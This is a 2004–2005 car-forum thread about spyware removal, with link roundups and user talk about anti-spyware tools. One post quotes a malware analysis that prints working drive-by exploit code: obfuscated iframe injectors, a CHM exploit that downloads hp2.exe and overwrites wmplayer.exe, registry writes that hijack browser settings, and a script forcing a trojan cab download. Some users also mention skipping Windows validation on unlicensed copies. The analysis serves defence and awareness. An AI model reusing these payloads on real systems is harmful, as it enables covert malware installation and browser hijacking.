Quantcast
Spyware Removal And Prevention Guide!!! - Beyond.ca - Car Forums
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 30

Thread: Spyware Removal And Prevention Guide!!!

  1. #1
    Join Date
    Jul 2002
    Location
    Calgary
    My Ride
    2016 VW MK7 R ORYX DSG TECH
    Posts
    903
    Rep Power
    22

    Exclamation Spyware Removal And Prevention Guide!!! Updated 6/18

    Updated 6-16-2004
    Spyware Removal And Prevention Guide!!!
    So the big question, what exactly is Spyware?: Spyware is a cookie or program installed onto your system by other programs or from a website without you knowledge and without your permission.
    The spyware then "watches" you while you surf the web, and in some cases will monitor you sending e-mail or playing games. The spyware then sends back this information to the author/source which can sometimes be personal or sensitive data - otherwise known as "calling home". You will usually receive pop-ups advertising Internet security or the very much needed “Pop-up blocker", some of the worse spyware has been documented to steal your most personal information from your computer such as credit card numbers and social security numbers.

    Where this spyware comes from isn't always the easiest to find out. Some of the most common spyware comes from “Gator,” “Comet Cursor” and “Hotbar”. Most free programs that proclaim to let you freely change to new screen savers and other uses are not really free. They contain spyware to watch your surfing habits, log information and advertise to you. Now before you start to panic, bear in mind that not all free programs contain spyware..
    For the rest of the guide: GO HERE!



    Updated 6-17-2004
    Spyware Removal Tools Compared
    With spyware on the rise we wanted to see which spyware/adware removal tool worked best under an infected machine. We placed 5 spyware/adware scanning and removing applications head-to-head to see which one gave the best results as far as finding the most infected objects. Read the full article @ Flexbeta.net



    Updated 6-18-2004
    Why You Should Dump Internet Explorer
    Interesting read on how an MCSE (MS Certified Software Engineer) comments on how bad IE really is...
    Are you still using IE?



    Updated 6-18-2004
    Ten Steps to a Secure PC
    PCStats have thrown up a new beginners guide to securing your PC againist viruses, Trojan horses and more! Here's a snip.

    With this guide, PCstats has set out to inform you clearly and concisely of the dangers you face, and the steps you can take to avoid them. Once you look through, I think you'll be struck by how little effort is required to make your PC more secure. Even performing the first five steps of this guide will make your system better protected than the vast majority of Internet connected PCs. It is not wise to rely on the comparative anonymity of the Internet to keep you safe. If you do, you will be burned eventually and inevitably. Secure your PC now to avoid future regrets.
    For the rest of the guide: GO HERE!

    Updated 8-31-2004
    Rogue/Suspect Anti-Spyware Products & Web Sites
    Last edited by GingeRRRBeef; 08-31-2004 at 03:31 PM.
    "Sic Parvis Magna"
    FKA Silver_SpecV

  2. #2
    Join Date
    May 2002
    Location
    Calgary, Alberta
    My Ride
    (maah raahde)
    Posts
    5,799
    Rep Power
    44

    Default

    Good idea. We get spyware related posts atleast once a week here (seriously).

  3. #3
    Join Date
    Nov 2002
    Location
    T2S
    My Ride
    pedals
    Posts
    3,247
    Rep Power
    25

    Default

    good post man.

  4. #4
    Join Date
    Jul 2002
    Location
    Calgary
    My Ride
    2016 VW MK7 R ORYX DSG TECH
    Posts
    903
    Rep Power
    22

    Default

    New Spyware article on www.wired.com

    "My first question, when something goes wrong on a computer or the network, is: What did you do right before the problem started? Ninety-nine percent of all computer problems are caused by what people did to their computers. But 99 percent of the people, 99 percent of the time, will insist that they did absolutely nothing odd or unusual before the computer died," said John Vitelle, a Chicago-based systems administrator.
    "No one installs it, yet this garbage is on so many machines. Obviously the spyware fairy shows up late at night and installs the junk on their systems," said Keith Hitchens, who maintains networks for several clients, including a Manhattan public relations firm and a magazine-publishing business.
    Last edited by GingeRRRBeef; 04-28-2004 at 06:13 PM.
    "Sic Parvis Magna"
    FKA Silver_SpecV

  5. #5
    Join Date
    Mar 2004
    Location
    I'm somewhere where I don't know where I am...
    My Ride
    That Blue Car
    Posts
    1,056
    Rep Power
    0

    Default

    spyware sucks, i ran 3 diffrent spyware programs last week and every one right after another picked up atleast 3-4 other spyware progs that the previous on missed, i used adaware 6, spybot, and free-av

    it sawks

    they should just start charging nayone that advertises with spyware companies, that wa they wont get any busines nad will eventually go away.

  6. #6
    Join Date
    Jul 2002
    Location
    Calgary
    My Ride
    2016 VW MK7 R ORYX DSG TECH
    Posts
    903
    Rep Power
    22

    Default

    updates!!!
    "Sic Parvis Magna"
    FKA Silver_SpecV

  7. #7
    Join Date
    Nov 2003
    Location
    Calgary, Alberta, Canada, North America, Earth, The Milky Way . . .
    Posts
    1,876
    Rep Power
    22

  8. #8
    Join Date
    Mar 2004
    Location
    Calgary
    My Ride
    Eclipse
    Posts
    1,657
    Rep Power
    22

    Default

    NEED A FREE PROGRAM TO DELETE SOME SPYWARE

    AHHHH im infested hahaha
    Originally posted by beemerm3
    so if we only seen 5 % of the oceans why not drain them or somethin lol or can u even transfer water from one ocean to another??? think of all the stuff u'd find treasures n eerything.

  9. #9
    Join Date
    Jun 2003
    Location
    Alaska
    My Ride
    Model S
    Posts
    2,034
    Rep Power
    26

    Default

    eye opening article...
    Follow the Bouncing Malware - Part I

    On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

    Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

    To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.

    Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

    In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

    Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

    After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then (for whatever reason... hey, it's what my "Joe Average" did) skipped several obvious links leading to Yahoo! and clicked instead on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

    yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

    In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following

    [20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

    Which results in the following HTML:

    -----------------------------------------------------------------------------------------------------------

    <html>
    <head>
    <title>Advertisement</title>
    </head>
    <body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
    <iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
    frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
    target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
    <div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
    <img src='http://adserver.aim4media.com/adlog.php?bannerid=459&amp;clientid=431&amp;zoneid=450&amp;source=&amp;
    block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
    height: 0px;'></div>
    </body>
    </html>


    -----------------------------------------------------------------------------------------------------------

    This results in the following HTTP GET:
    [20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

    -----------------------------------------------------------------------------------------------------------
    And the following HTML gets downloaded:

    <a href="http://www.lovemynet.com/?frombanner2" target="_blank">
    <img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
    </a>
    <!-- HP2 -->
    <script type="text/javascript">document.write('
    \u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
    \u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
    \u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
    \u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
    \u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
    \u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>


    -----------------------------------------------------------------------------------------------------------

    Looks like someone is trying to hide something... This decodes to:

    <iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>


    -----------------------------------------------------------------------------------------------------------

    [20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

    Which gives us:
    -----------------------------------------------------------------------------------------------------------

    <!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
    <script type="text/javascript">document.write('
    \u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
    \u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
    \u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
    \u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
    \u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
    \u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
    \u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
    \u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
    \u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
    \u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
    \u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
    \u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
    \u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
    \u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
    \u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
    \u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
    \u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
    \u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
    \u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
    \u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
    \u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
    \u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
    \u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
    \u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
    \u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
    \u0072\u0069\u0070\u0074\u003e')</script>


    -----------------------------------------------------------------------------------------------------------

    Which decodes to:

    <textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
    </textarea>
    <script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
    </script>


    -----------------------------------------------------------------------------------------------------------

    [20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

    Within this chm exploit, we find the following hp2.htm file:

    -----------------------------------------------------------------------------------------------------------

    <script language="vbscript">
    Function Exists(filename)
    On Error Resume Next
    LoadPicture(filename)
    Exists = Err.Number = 481
    End Function
    </script>
    <script language="javascript">
    var oPopup = window.createPopup();
    function showPopup()
    {
    oPopup.document.body.innerHTML =
    "<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
    oPopup.show(0,0,1,1,document.body);
    }
    showPopup()
    wmplayerpaths= [
    "C:\\Programmer\\Windows Media Player\\wmplayer.exe",
    "C:\\Program\\Windows Media Player\\wmplayer.exe",
    "C:\\Programme\\Windows Media Player\\wmplayer.exe",
    "C:\\Programmi\\Windows Media Player\\wmplayer.exe",
    "C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
    "C:\\Programas\\Windows Media Player\\wmplayer.exe",
    "C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
    "C:\\Program Files\\Windows Media Player\\wmplayer.exe"
    ];
    for (i=0;i<wmplayerpaths.length;i++) {
    wmplayerpath = wmplayerpaths[i];
    if (Exists(wmplayerpath))
    break;
    }
    function getPath(url) {
    start = url.indexOf('http:')
    end = url.indexOf('HP2.CHM')
    return url.substring(start, end);
    }
    payloadURL = getPath(location.href)+'hp2.exe';
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET",payloadURL,0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile(wmplayerpath,2);
    var win=null;
    function NewWindow(mypage,myname,w,h,scroll,pos){
    if(pos=="random"){
    LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
    TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
    }
    if(pos=="center"){
    LeftPosition=(screen.width)?(screen.width-w)/2:100;
    TopPosition=(screen.height)?(screen.height-h)/2:100;
    }
    else if((pos!="center" && pos!="random") || pos==null){
    LeftPosition=0;TopPosition=20
    }
    settings='width='+w+',height='+h+',top='
    +TopPosition+',left='+LeftPosition
    +',scrollbars='+scroll
    +',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
    win=window.open(mypage,myname,settings);
    }
    location.href = "mms://";
    </script>


    -----------------------------------------------------------------------------------------------------------

    Following along...
    [20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

    -----------------------------------------------------------------------------------------------------------

    <html>
    <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script>
    wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://default-homepage-network.com/start.cgi?new-hkcu");
    wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
    "http://default-homepage-network.com/start.cgi?new-hklm");
    wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
    "http://server224.smartbotpro.net/7search/?new-hkcu");
    wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
    wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
    "http://server224.smartbotpro.net/7search/?new-hklm");
    wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
    </script>
    <script language=javascript>
    self.close()
    </script>
    </html>


    -----------------------------------------------------------------------------------------------------------

    Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

    [20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

    hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact http://www.totalvelocity.com/Bundlin...dater4bp5.exe, which installs/updates the "TV Media Display" spyware.

    At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

    Now, this code within popup.js is executed:

    -----------------------------------------------------------------------------------------------------------

    if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
    var expdate = new Date((new Date()).getTime() + 1800000);
    document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
    document.write("<script language=\"JavaScript\"
    src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
    }


    -----------------------------------------------------------------------------------------------------------

    [20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"

    -----------------------------------------------------------------------------------------------------------

    var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
    var retry_enabled = true;
    var retry_cnt=1;
    document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
    function retry() {
    if(retry_cnt>0) {
    alert("To install latest AT- Games update, please click Yes");
    start_download();
    retry_cnt--;
    } else {
    //alert("This is a 1 time install, once you click Open it will never pop up this message again");
    //downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
    }
    }
    function start_download()
    {
    var bname=navigator.appName;
    var bver=parseInt(navigator.appVersion);
    if ( navigator.platform && navigator.platform != 'Win32' ){
    //alert("Sorry, your browser is not WIN32 Compatible");
    }
    if (bname == 'Microsoft Internet Explorer' && bver >= 2){
    document_code = '<html><head>\n';
    document_code += '<\/head><body>\n';
    document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
    classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
    codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
    HEIGHT=0 WIDTH=0></object>\n';
    document_code += '<\/body><\/html>';
    downloads_manager.document.write(document_code);
    downloads_manager.document.close();
    }
    else if (bname == 'Netscape' && bver >= 4) {
    trigger = netscape.softupdate.Trigger;
    if (trigger.UpdateEnabled) {
    //trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
    } else {
    location.replace(exepath);
    }
    } else {
    location.replace(exepath);
    }
    }
    start_download();


    -----------------------------------------------------------------------------------------------------------

    [20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

    This cab file contains two files:

    ATPartners.inf - 403 bytes
    ATPartnets.dll - 96,256 bytes

    The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

    And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.
    Last edited by googe; 09-30-2004 at 02:17 AM.

  10. #10
    Join Date
    Jul 2002
    Location
    Calgary
    My Ride
    2016 VW MK7 R ORYX DSG TECH
    Posts
    903
    Rep Power
    22

    Default

    "Sic Parvis Magna"
    FKA Silver_SpecV

  11. #11
    Join Date
    Dec 2002
    Location
    the titty bar...
    My Ride
    starts with a screwdriver...
    Posts
    1,304
    Rep Power
    23

    Default

    thanks alot for the post, my computer was totally full of crap! that new firefox has helped alot too. thanks again!
    I MAKE BALLER CARS MORE BALLER.....

  12. #12
    Join Date
    Nov 2003
    Location
    Calgary, Alberta, Canada, North America, Earth, The Milky Way . . .
    Posts
    1,876
    Rep Power
    22

  13. #13
    Join Date
    Mar 2004
    Location
    Vancouver
    Posts
    1,076
    Rep Power
    22

    Default

    i use norton 05 and opera
    i only use IE rarely and only for emails or sites that require specific plug-ins

    so far for most ppl that followed this roughly they have no problems

    I guess you have to be careful when you visit sites
    ie. finding a crack on astalavista, usually when you find one and there's a 'download' button and you click on it on IE (w/o antivirus etc) you're bound to get the spyware/virus. when you use opera and norton to click it, opera first asks you if you wan to d/l the xxx.exe generic spyware file-something like sexphone.exe, than norton blocks the virus exploit

    just a thought >.<

  14. #14
    Join Date
    Jun 2003
    Location
    Nottingham, UK
    My Ride
    VW Scirocco GT
    Posts
    2,130
    Rep Power
    23

    Default

    So does firefox!

  15. #15
    Join Date
    Mar 2005
    Location
    latitude 49 16 N, longitude 123 07 W
    My Ride
    1988 Suzuki Forsa VGA
    Posts
    6
    Rep Power
    0

    Default

    This download is available to customers running genuine Microsoft Windows. Please click Continue to begin Windows validation.
    Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

    However, my laptop has XP Home, and I also use Firefox.

  16. #16
    Join Date
    May 2002
    Location
    Calgary
    My Ride
    6.7 CUMMINS, E50 AMG
    Posts
    4,820
    Rep Power
    27

    Default

    i personally use this, it has very good functionality, especially real time protection
    Machining, Fabricating, Welding etc.

  17. #17
    Join Date
    Mar 2005
    Location
    latitude 49 16 N, longitude 123 07 W
    My Ride
    1988 Suzuki Forsa VGA
    Posts
    6
    Rep Power
    0

    Default

    Originally posted by legendboy


    i personally use this, it has very good functionality, especially real time protection
    Only thing I dont like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

    I've had some serious issues with it on both Pro & Home. Being that it's now a M$ product, they're not going to do much about it.

  18. #18
    Join Date
    Jun 2002
    Location
    Calgary, AB
    Posts
    1,991
    Rep Power
    30

    Default

    Originally posted by pantharen



    Not all of us run legit copies of XP, personally I do like my copy of Corp XP.

    However, my laptop has XP Home, and I also use Firefox.

    You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

    I've found the MS Spyware Checker to be the best.

  19. #19
    Join Date
    Mar 2005
    Location
    latitude 49 16 N, longitude 123 07 W
    My Ride
    1988 Suzuki Forsa VGA
    Posts
    6
    Rep Power
    0

    Default

    Originally posted by roopi



    You don't need to have a legit copy of XP to download this. The second step lets you skip the verification process.

    I've found the MS Spyware Checker to be the best.
    Ahhh then they have changed it, I downloaded days after M$ bought Giant, and they wouldn't allow my "copy" of XP to download it, they wanted me to contact M$.

  20. #20
    Join Date
    Feb 2005
    Location
    Calgary
    My Ride
    1996 Plymoth Voyager SE
    Posts
    81
    Rep Power
    0

    Default

    Originally posted by pantharen


    Only thing I dont like about Giant anti-Spy (Yes I know it's beta) is it crashes my computer randomly.

    I've had some serious issues with it on both Pro &amp; Home. Being that it's now a M$ product, they're not going to do much about it.
    Actually as of today, you need to have a Geniune copy of Windows XP (or a geniune CORP key) to use windows update or download most microsoft applications. Skipping or "disabling" the verification plugin wont do shit, you will only get access to "some "critical updates and not all of them. Automatic Updates will still work but will again only download a few critial updates.

Page 1 of 2 1 2 LastLast

Similar Threads

  1. Spyware removal

    By CKY in forum Computers, Consoles, and other Electronics
    Replies: 9
    Latest Threads: 04-22-2004, 11:47 PM
  2. FS: Final Fantasy Tactics and FF7 Strategy Guide

    By JJLuke in forum Video Games / Consoles
    Replies: 3
    Latest Threads: 02-20-2004, 01:07 AM
  3. Rust Prevention?

    By trdjce10 in forum Mechanical
    Replies: 5
    Latest Threads: 01-04-2004, 06:07 PM
  4. Car Theft Prevention

    By thich in forum General Car/Bike Talk
    Replies: 17
    Latest Threads: 12-24-2003, 11:53 AM
  5. PVC Valve location and install guide *pics*

    By Ekliptix in forum Mechanical
    Replies: 5
    Latest Threads: 10-01-2002, 12:30 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •